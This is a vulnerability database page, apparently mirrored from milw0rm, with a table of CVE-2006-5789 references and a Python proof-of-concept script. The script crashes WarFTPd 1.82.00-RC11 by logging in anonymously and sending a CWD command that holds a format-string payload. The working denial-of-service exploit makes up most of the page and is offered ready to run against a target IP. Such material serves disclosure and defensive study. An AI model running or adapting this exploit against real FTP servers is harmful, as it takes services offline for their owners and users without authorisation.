WarFTPd 1.82.00-RC11 - Remote Denial of Service
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
| WarFTP Daemon < 1.82.00-RC13 Multiple Command Remote Format Strings | 7 Nov 200600:00 | – | nessus | |
| CVE-2006-5789 | 7 Nov 200623:00 | – | cve | |
| CVE-2006-5789 | 7 Nov 200623:00 | – | cvelist | |
| EUVD-2006-5773 | 7 Oct 202500:30 | – | euvd | |
| CVE-2006-5789 | 7 Nov 200623:07 | – | nvd | |
| WarFTPD Multiple Format String Vulnerabilities | 1 Oct 200900:00 | – | openvas | |
| WarFTPD Multiple Format String Vulnerabilities | 1 Oct 200900:00 | – | openvas |
#!/usr/bin/env python
import sys
import ftplib
print "WAR_FTPD Remote Denial Of Service (DOS)"
print "Copyright (c) Joxean Koret"
print
target = "192.168.1.13"
targetPort = "21"
try:
ftp = ftplib.FTP()
print "[+] Connecting to target "
msg = ftp.connect(target, targetPort)
print "[+] Ok. Target banner"
print msg
print
print "[+] Trying to logging anonymously"
msg = ftp.login() # Anonymous
print "[+] Ok. Message"
print msg
print
except:
print "[!] Exploit doesn't work. " + str(sys.exc_info()[1])
sys.exit(0)
a = "%s%s"
"""
for i in range(0):
a += a
"""
b = "AAAA"
for i in range(6):
b += b
a = a + b
print "[+] Exploiting with a buffer of " + str(len(a)) + " byte(s) ... "
try:
ftp.cwd(a)
except:
print "[+] Exploit apparently works. Trying to verify it ... "
try:
ftp.connect(target, targetPort)
print "[!] No, it doesn't work [" + str(sys.exc_info()[1]) + "] :("
except:
print "[!] Ok. Server is dead, exploit successfully executed. "
# milw0rm.com [2006-11-07]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Sep 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24
EPSS0.02944